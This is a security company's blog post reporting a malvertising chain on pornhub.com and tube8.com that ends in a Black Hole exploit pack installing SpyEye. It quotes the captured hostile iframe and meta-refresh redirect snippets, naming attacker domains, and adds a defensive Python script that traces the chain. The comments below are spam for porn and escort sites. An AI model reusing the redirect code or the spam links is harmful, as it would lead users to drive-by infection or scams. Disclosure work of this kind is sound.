Porn sites have lots of traffic...and malvertisements

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

If you walk into our office after work hours and see a couple of us gathered around Chris' seat, staring at his multiple big screens showing lots of porn... believe us, we're actually working hard.

At Armorize we actively scan the Web for malware. Of course we can't cover the entire Web, so we try to at least have decent coverage of the bigger websites. When we set up the platform some time ago, one thing we noticed immediately was: wow, a good percentage of the "bigger websites" on the internet (those with lots of traffic) are porn sites!

And as we started running the scanning operation, we soon realized that porn sites not only have a lot of traffic, but also frequently fall victim to malvertising.

In malvertising, malicious advertisements (malvertisements) are served by publishers (websites) to their visitors through ad networks and exchanges. If the malvertisement involves drive-by download exploits, a visitor can be infected without knowing anything, clicking on anything, or agreeing to anything.

Here's our report of how a malicious advertiser, celeb-escorts.com, got two very large websites to serve its malvertisement.

The first website is pornhub.com, Alexa Top 62 with 23,873,546 unique visitors per day.

Very large traffic indeed. The malvertisement was provided to pornhub.com by etology.com, an ad exchange, which loads it from its advertiser, celeb-escorts.com. That domain was created on May 11th, 2011, two days before we first saw the malvertisement, so it is very possible that celeb-escorts.com was registered by a malicious party for the purpose of submitting malvertisements to ad networks and exchanges. Below is an illustration of the parties involved:

This is the particular malvertisement from celeb-escorts. Although its URL ends in .jpg, the response is HTML: the visible banner image plus a small iframe pointing to tun4atta.in, the start of a chain of malicious domains:

Here is the detailed chain, with code snippets:

1. http://www.pornhub.com/

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage

3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/

4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29

5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html

6. http://pages.etology.com/imp2/93114.php

<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>

7. http://celeb-escorts.com/banners/300x250.jpg

<a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg' border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>

8. http://tun4atta.in/bcounter.php?u=adult

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

9. http://iban6duo.in/ts/in.cgi?adult

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(Above serves the final malware)

The browser exploits were served by the Black Hole exploit pack. The malware finally installed has kept changing since our initial discovery on May 13th.

The malware initially installed on visitors' machines was SpyEye, crimeware similar to Zeus. The antivirus detection rate at the time was 3 out of 42 vendors on VirusTotal; it has since increased to 21 out of 42 vendors.

The malware currently being served is still SpyEye, but repacked, which brings its VirusTotal detection rate back down to 5 out of 42.

The second website is tube8.com, Alexa Top 113 with 10,885,350 unique visitors per day.

The top-level ad agency is the same, Traffic Junky (trafficjunky.net), and the ad exchange is the same as well, etology.com. We can actually see the same malvertisement from celeb-escorts.com on tube8.com:

Below is an illustration of the chain:

The detailed traffic chain is below:

1. http://tube8.com

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage

3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html

<iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300

5. http://pages.etology.com/imp2/96244.php

6. http://celeb-escorts.com/banners/300x250.jpg

7. http://tun4atta.in/bcounter.php?u=adult

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

8. http://iban6duo.in/ts/in.cgi?adult

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(Above serves the final malware)
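The two chains above differ only in the publisher and the first hops; from the etology page onward they are identical, down to the same `tp=` token on the landing page. Below is an added example, written for this page and not Armorize's scanner or any code from the post, that walks such a chain offline from the snippets captured above. It decodes the exchange's escaped `bannerCode` (the `\074` octal escapes that stand in for `<`), follows iframe and meta-refresh hops, and flags the two things a reviewer should notice in these captures: HTML served from a URL that ends in .jpg, and iframes sized so that they are not meant to be seen. The response bodies are the ones quoted in the post (the etology page is cut down to the fields that carry the advertiser's code); the final landing page was not captured, so the walk stops there. The 100-pixel "hidden-size" threshold is an assumption of this example, not anything the post states.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hop URL -> response body, copied from the snippets captured in the post.
# The etology page is cut down to the fields that carry the advertiser's code,
# and the final landing page was never captured, so it has no entry here.
CAPTURED = {
    "http://pages.etology.com/imp2/93114.php":
        "<script type=\"text/javascript\">var ad={payments:[{is3rdPartyAd:'true',"
        "id:174131,bannerCode:\"\\074iframe src=http://celeb-escorts.com/banners/"
        "300x250.jpg width=\\'300\\'\\r\\nheight=\\'250\\' frameborder=\\'0\\' "
        "scrolling=\\'no\\'>\\074/iframe>\"}]};</script>",
    "http://celeb-escorts.com/banners/300x250.jpg":
        "<a href='http://celeb-escorts.com/' target='_parent'><img src='http://"
        "celeb-escorts.com/images/banner-300x250.jpeg' border=0></a><iframe "
        "src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' "
        "frameborder='0' scrolling='no'></iframe>",
    "http://tun4atta.in/bcounter.php?u=adult":
        "<iframe width='34' height='44' frameborder='0' scrolling='no' "
        "src='http://iban6duo.in/ts/in.cgi?adult'></iframe>",
    "http://iban6duo.in/ts/in.cgi?adult":
        "<html><head><meta http-equiv=\"REFRESH\" content=\"1; URL='http://finish."
        "horseretirementhome.com/index.php?tp=452874001a8808fb'\"></head><body>"
        "document moved <a href=\"http://finish.horseretirementhome.com/index.php"
        "?tp=452874001a8808fb\">here</a></body></html>",
}

IMAGE_EXT = (".jpg", ".jpeg", ".gif", ".png")
HIDDEN_PX = 100  # assumption: an iframe under 100x100 px is not meant to be seen
_JS_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}


def decode_js_string(s):
    """Undo the escapes used inside a JS string literal: octal \\ooo (the \\074
    the exchange uses for '<'), plus \\' \\" \\\\ \\r \\n \\t."""
    def repl(m):
        e = m.group(1)
        return chr(int(e, 8)) if re.fullmatch(r"[0-7]{1,3}", e) else _JS_ESCAPES.get(e, e)
    return re.sub(r"\\([0-7]{1,3}|.)", repl, s)


def extract_banner_code(body):
    """Return the advertiser-supplied bannerCode from the exchange's ad object
    as decoded HTML, or None if the body carries no such field."""
    m = re.search(r'bannerCode:"((?:[^"\\]|\\.)*)"', body)
    return decode_js_string(m.group(1)) if m else None


def _px(value):
    m = re.match(r"\d+", value or "")
    return int(m.group()) if m else None


class HopParser(HTMLParser):
    """Collect iframe sources (with size) and meta-refresh targets from one response."""
    def __init__(self):
        super().__init__()
        self.iframes, self.refreshes = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe" and a.get("src"):
            self.iframes.append((a["src"], _px(a.get("width")), _px(a.get("height"))))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
            if m:
                self.refreshes.append(m.group(1))


def walk(start, fetch, max_hops=10):
    """Follow the chain from `start` one hop at a time: decoded third-party banner
    code, then the first iframe src, else the first meta refresh. `fetch(url)`
    returns a body or None. Each hop is {"url", "via", "flags"}; the walk stops at
    a hop that cannot be fetched, at a dead end, or on a loop."""
    hops, seen = [], set()
    url, via, flags = start, "start", []
    while url and url not in seen and len(hops) < max_hops:
        seen.add(url)
        body = fetch(url)
        if body is None:
            hops.append({"url": url, "via": via, "flags": flags + ["not captured"]})
            break
        html = extract_banner_code(body)
        if html is None:
            html = body
        else:
            flags.append("advertiser-supplied bannerCode decoded")
        if urlparse(url).path.lower().endswith(IMAGE_EXT) and "<" in html:
            flags.append("HTML served from image URL")
        p = HopParser()
        p.feed(html)
        hops.append({"url": url, "via": via, "flags": flags})
        base, url, via, flags = url, None, None, []
        if p.iframes:
            src, w, h = p.iframes[0]
            url, via = urljoin(base, src), f"iframe {w}x{h}"
            if w is not None and h is not None and w < HIDDEN_PX and h < HIDDEN_PX:
                flags.append("hidden-size iframe")
        elif p.refreshes:
            url, via = urljoin(base, p.refreshes[0]), "meta refresh"
    return hops


if __name__ == "__main__":
    for hop in walk("http://pages.etology.com/imp2/93114.php", CAPTURED.get):
        print(f"{hop['via']:>16}  {hop['url']}  {', '.join(hop['flags'])}")
```

Run against a live crawler, `fetch` would be the function that retrieves each URL from a disposable browser or a sandboxed HTTP client; here it is just `CAPTURED.get`. The walk only follows the first iframe or refresh it finds, which is enough for a chain like this one; a crawler that wants the whole tree of a real ad slot would branch on every iframe and on script-inserted frames as well.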

With these two sites having 23,873,546 and 10,885,350 unique visitors per day, respectively, and both serving this malvertisement from celeb-escorts.com since at least May 13th, a good number of visitors are likely to have been infected.

12 comments:

Robin harry said...

Porn videos every day, just for you and for free.

porno

Robin harry said...

Porn videos every day, just for you and for free.

http://vyhon.sk/

Schenky said...

The best porn videos for free

Yersi2655 said...

http://updatespasswordspremium.blogspot.com

Premium accounts 2013, new accounts every week for the best porn sites

Denverj97 said...

Just curious to know how much a porn site can generate in revenue, since that info is never public, but I'm sure some insiders would know.

Tube Porn

joseph said...

Hi...

Friends, I am Josef Mengele from London. I need the Escorts Service. I searched on Google and then found the Nandani Gupta Web site. Nandani Gupta is the best Escorts service provider. Escorts in Delhi.

All in All seo said...

» Thai Oral Sex Stories
» Free sex videos
» Free porn movies

Nong-Porn said...

If you like watching Asian girls get fucked.

Free Asian Porn Tube

bilua khaiba said...

car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire,car hire
https://www.whatdotheyknow.com/request/limobrokercouk_limo_broker_ltd

nilupoma said...

This site caters to lesbians, bisexuals, transgendered people, and even gay men. This ad-free, not-for-profit site doesn't collect your personal information or use "cookies," so browse away discreetly at their wide array of saucy tales. You can even browse by author!

Bria Bridgitte said...

Find your horny and sexy partner with adultpunter.com

Bria Bridgitte said...

adultpunter.com, the best worldwide dating and classifieds site to promote your business in front of a large audience.
